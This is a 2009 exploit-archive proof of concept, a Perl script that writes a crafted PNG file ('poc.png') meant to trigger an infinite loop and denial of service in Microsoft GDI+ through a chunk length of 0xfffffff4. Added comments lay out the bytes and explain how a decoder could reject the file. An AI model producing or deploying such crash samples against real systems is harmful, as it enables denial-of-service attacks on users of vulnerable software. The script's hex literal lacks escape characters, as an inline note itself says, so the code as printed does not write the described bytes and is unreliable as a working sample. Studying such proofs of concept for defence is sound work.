
# Title : Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC
# Published : 2009-04-17
# Author : Code Audit Labs


#! /usr/bin/perl
#CAL_gdiplug_poc.pl
#
# Microsoft_gdiplug_png_infinite_loop_D.o.S POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
# 
#Affected
#========
#Tested on a fully updated WinXP SP3
#Other versions should be affected as well
#
#CVE: please assign a CVE number
#
#DESCRIPTION
#===========
#
#  The vulnerability is in the Microsoft GDI+ code that processes PNG files. A crafted PNG file causes an infinite loop, which results in high CPU usage (100%) and a denial of service (D.o.S).
#
#
#ANALYSIS
#========
#
#  png chunk
#
# {
#	DWORD btChunkLen;
#	CHAR btChunkType[4];
#} CHUNK_HEADER;

#If btChunkLen is 0xfffffff4, the parsing code falls into an infinite loop.
#

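# Writes the proof-of-concept sample to "poc.png" in the current working
# directory, replacing any existing file of that name.
#
# The literal below is reproduced exactly as it appears on this page.  Read as
# a sequence of hex byte values it lays out as:
#   89 50 4e 47 0d 0a 1a 0a      PNG signature
#   00 00 00 0d  49 48 44 52     chunk header: length 13, type "IHDR"
#   00 00 03 00  00 00 04 00     IHDR width and height fields
#   08 02 00 00 00               remaining five IHDR bytes
#   d9 44 a9 57                  four bytes in the IHDR CRC position
#   ff ff ff f4  41 41 41 41     chunk header: length 0xfffffff4, type "AAAA"
#   62 01 ... 3e e8              16 trailing bytes
# NOTE(review): as printed here the literal carries no escape characters, so
# Perl writes these characters verbatim rather than the byte values.
#
# Defensive reading: the second length field is the value named in the
# ANALYSIS header above.  The PNG specification limits a chunk length to
# 2^31-1, and the declared length is also far larger than the data left in the
# file, so a decoder that validates the length field against both limits can
# reject this sample instead of iterating on it.
use strict;
use warnings;

my $out_path = 'poc.png';

my $data =
"x89x50x4ex47x0dx0ax1ax0ax00x00x00x0dx49x48x44x52" .
"x00x00x03x00x00x00x04x00x08x02x00x00x00xd9x44xa9" .
"x57xffxffxffxf4x41x41x41x41x62x01x08xcbx06x49x3e" .
"xd7x0ax00x22xe3xf1x32x3exe8";

# Three-argument open with a lexical handle: the mode can never be taken from
# the file name, and the handle does not leak into the package namespace.
open(my $out_fh, '>', $out_path) || die "can't create crash sample.$!";

# Raw mode so no newline translation is applied on Windows.
binmode($out_fh);

# Buffered write errors (disk full, permissions) only surface at print/close,
# so both are checked instead of silently leaving a truncated sample.
print {$out_fh} $data or die "can't write $out_path: $!";

close($out_fh) or die "can't close $out_path: $!";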
